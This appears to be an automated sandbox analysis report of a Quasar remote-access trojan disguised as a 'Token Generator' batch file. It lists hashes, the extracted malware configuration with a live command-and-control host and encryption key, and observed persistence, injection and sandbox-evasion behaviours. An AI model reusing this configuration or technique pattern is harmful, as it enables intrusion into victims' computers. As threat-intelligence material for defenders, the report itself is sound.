Analysis
-
max time kernel
115s -
max time network
117s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27-05-2024 22:09
Static task
static1
Behavioral task
behavioral1
Sample
Token Generator.bat
Resource
win7-20240508-en
General
-
Target
Token Generator.bat
-
Size
3.5MB
-
MD5
e984ebea899379a8c0a47f9308c7370b
-
SHA1
863330006bef4c55a1bc79771ae989dc0412f717
-
SHA256
9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
-
SHA512
70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975
-
SSDEEP
49152:HgquNH3RLlp72pnTcrwIBX1F2A5LzeuUxZ3u3AnCH4El0oKYlL:HY
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Extracted
quasar
1.4.1
Token Gen
uk2.localto.net:6103
0c14e9f2-6918-4e50-8463-04ad871c1e3d
-
encryption_key
6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
-
install_name
$77-powershell.exe
-
log_directory
$77-Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77-Rootkit
Signatures
-
Quasar payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/2756-14-0x00000239F99F0000-0x00000239F9E8E000-memory.dmp family_quasar behavioral2/memory/4592-54-0x000001F3E03D0000-0x000001F3E06F4000-memory.dmp family_quasar C:\Users\Admin\AppData\Local\Temp\Token Generator.exe family_quasar behavioral2/memory/4932-72-0x00000000006E0000-0x0000000000A04000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4860 created 624 4860 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2756 powershell.exe 1188 powershell.exe 4592 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
MBSetup.exedescription ioc process File created C:\Windows\SysWOW64\drivers\mbamtestfile.dat MBSetup.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exeMBSetup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MBSetup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate MBSetup.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 6 IoCs
Processes:
Token Generator.exeInstall.exe$77-powershell.exe$77-powershell.exeMBSetup.exeMBAMInstallerService.exepid process 4932 Token Generator.exe 1744 Install.exe 1964 $77-powershell.exe 3380 $77-powershell.exe 5256 MBSetup.exe 5980 MBAMInstallerService.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\K: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
wmiprvse.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 22 IoCs
Processes:
svchost.exesvchost.exesvchost.exepowershell.EXEsvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Discord svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4860 set thread context of 3524 4860 powershell.EXE dllhost.exe -
Drops file in Program Files directory 5 IoCs
Processes:
MBAMInstallerService.exeMBSetup.exedescription ioc process File created C:\Program Files\Malwarebytes\04c273931c7611ef853afe5db4a87adc MBAMInstallerService.exe File created C:\Program Files\Malwarebytes\Anti-Malware\04c273941c7611efac30fe5db4a87adc MBAMInstallerService.exe File created C:\Program Files (x86)\mbamtestfile.dat MBSetup.exe File created C:\Program Files\Malwarebytes\Anti-Malware\c0f5b849-948f-4f90-a096-7c4bf9ebb704 MBSetup.exe File created C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe MBSetup.exe -
Drops file in Windows directory 6 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exewmiprvse.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2396 schtasks.exe 424 schtasks.exe 1112 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exemousocoreworker.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exesvchost.exeOfficeClickToRun.exepowershell.EXEmousocoreworker.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000079db0400d10bda458d4a587e576cd728000000000200000000001066000000010000200000008bae4dbdfd9085617f2083a33ac05c6857d7cc0d9d918a2977e2d718835d4905000000000e800000000200002000000082fc5cfa799e87b98d25d6e6f29e7746eab4de5800ecde36d7b8880ba47b19a9b0030000c2cdf61b34875672d89681440811593601650a6e19a8098f93e7528aeaffb5705a105d7679567c56cb29937e4f4b06cc3b1c210adbc2772899d839a822e3b0dae8e315fe238fa9f147d2222c184baea47e3eb59d7ad831856cd3906408ceab0833aac9954ec1e63ccff806018015533d7a6e43a9499fd0c02bcdd302451e10358472cce15818a1e5c07bff009ba3a98983fc0387717cd8abb095f5b7b49a402155ba9d04af2d3ed6ebbbb380b9a21923f75fa3e1049a6d9bd043a60b46bc9e5d4b5f0b027bc682b6a0582148b506aefa6fd3851f99d3ab0a7947dc20cad0c4b2d80cc464c229199feb0307071c71d08a3976585631c9380e62e56fa3809df4cc0ab097adb7859d0d059aaad986947ce8acba6a47754136195316e216cf5dd011c43e4d943b8cfe311e68eaf20b15c544fde477a5b5afc8520599c91ad8373490a48b714e43339e6998ad6ccbe2799aa728855f48e39598b67af67befaf2eb0a9269d75d3a71639a8d0128ef7515b1310d71c08e09bff9f4e4a854ad7f6a646faff804db4527619d2d3530b227f5167a8941d36d39df4f1a8ee92985b2c868852695527a7a63a645c2948ad5cefdd1ea90c2f5e4af82e26e656e9af233e4cfe887775e263e6e4a95ec21dc4cb3921b3c235579f6ad9160397d51749545239abb80c5f202e9b8f2ade05b61076dc82b5ebf3d2b705b1043b0bc0a2139cb056897db94e020cde722b93175a07709da4f0f6098b2eafe4de02212a197961a5909310430e6f3298e340a38875d1710f34a12b93f2c632442ff096053892085f1ea6d90e4d07cb5d71e7b987dc75e75e82ade735fc671bb31414b48d61c27e0e42c09de336ed20d934777f0b8ca6c4fff3923debed911da9a52fe0e25336f70493a707ce74d8f9078db9445e7044f4ba79e86ebb5b21bb70fabb66700178778a17f1f8fe501af153977c949f283bafcea40400fc0937b15e6e1fe503d41d86331527b595c6a8a5a0174eb749a6641312203ee9c3ed94847abbd78aa72d260723390b61e618f71cafa246547d75a670984021746728a0c8a0c5b1d124cadcfb77d247fb0e4f71db5db8aa91263d77be08854cbd02d99197cfcc933f258aa2d8e1984a27371a9009fb8f2e2cd37a002c9a430d0e2f113fdfc40ee69739fe1a62ad4c4bb98d1dec97b75bc51a9711b55c0cba98c6fc58d98c7e99bfed5354a34834918f69999c41e12b19c352ecc27ef670738bcfe792c215ff4a98ab3ef16b463d72d547d0748ab6873813cb8d02a0dc5fd87501898889299fc5e8e489b8d69d44fb17429a85e7d1b4328c2a67c35760f396004740000000bd683d94bfe32d569c3204b8847e92ad52656a12e2ba9df7a0995e835f39e66409c84691ebdd3bb8483d36717452ec677c2af25d446a558493e2a644fa39f24c mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018400E1E99464E" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE -
Modifies registry class 6 IoCs
Processes:
Explorer.EXEsihost.exemsedge.exepowershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-711569230-3659488422-571408806-1000\{99C49BB3-2594-4ACF-9A5A-F234E33DC2A6} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings powershell.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 987473.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeToken Generator.exepowershell.EXEdllhost.exepid process 2756 powershell.exe 2756 powershell.exe 1188 powershell.exe 1188 powershell.exe 4592 powershell.exe 4592 powershell.exe 4932 Token Generator.exe 4860 powershell.EXE 4860 powershell.EXE 4860 powershell.EXE 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 4592 powershell.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe 3524 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3464 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
Processes:
msedge.exepid process 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe 4772 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeIncreaseQuotaPrivilege 1188 powershell.exe Token: SeSecurityPrivilege 1188 powershell.exe Token: SeTakeOwnershipPrivilege 1188 powershell.exe Token: SeLoadDriverPrivilege 1188 powershell.exe Token: SeSystemProfilePrivilege 1188 powershell.exe Token: SeSystemtimePrivilege 1188 powershell.exe Token: SeProfSingleProcessPrivilege 1188 powershell.exe Token: SeIncBasePriorityPrivilege 1188 powershell.exe Token: SeCreatePagefilePrivilege 1188 powershell.exe Token: SeBackupPrivilege 1188 powershell.exe Token: SeRestorePrivilege 1188 powershell.exe Token: SeShutdownPrivilege 1188 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeSystemEnvironmentPrivilege 1188 powershell.exe Token: SeRemoteShutdownPrivilege 1188 powershell.exe Token: SeUndockPrivilege 1188 powershell.exe Token: SeManageVolumePrivilege 1188 powershell.exe Token: 33 1188 powershell.exe Token: 34 1188 powershell.exe Token: 35 1188 powershell.exe Token: 36 1188 powershell.exe Token: SeIncreaseQuotaPrivilege 1188 powershell.exe Token: SeSecurityPrivilege 1188 powershell.exe Token: SeTakeOwnershipPrivilege 1188 powershell.exe Token: SeLoadDriverPrivilege 1188 powershell.exe Token: SeSystemProfilePrivilege 1188 powershell.exe Token: SeSystemtimePrivilege 1188 powershell.exe Token: SeProfSingleProcessPrivilege 1188 powershell.exe Token: SeIncBasePriorityPrivilege 1188 powershell.exe Token: SeCreatePagefilePrivilege 1188 powershell.exe Token: SeBackupPrivilege 1188 powershell.exe Token: SeRestorePrivilege 1188 powershell.exe Token: SeShutdownPrivilege 1188 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeSystemEnvironmentPrivilege 1188 powershell.exe Token: SeRemoteShutdownPrivilege 1188 powershell.exe Token: SeUndockPrivilege 1188 powershell.exe Token: SeManageVolumePrivilege 1188 powershell.exe Token: 33 1188 powershell.exe Token: 34 1188 powershell.exe Token: 35 1188 powershell.exe Token: 36 1188 powershell.exe Token: SeIncreaseQuotaPrivilege 1188 powershell.exe Token: SeSecurityPrivilege 1188 powershell.exe Token: SeTakeOwnershipPrivilege 1188 powershell.exe Token: SeLoadDriverPrivilege 1188 powershell.exe Token: SeSystemProfilePrivilege 1188 powershell.exe Token: SeSystemtimePrivilege 1188 powershell.exe Token: SeProfSingleProcessPrivilege 1188 powershell.exe 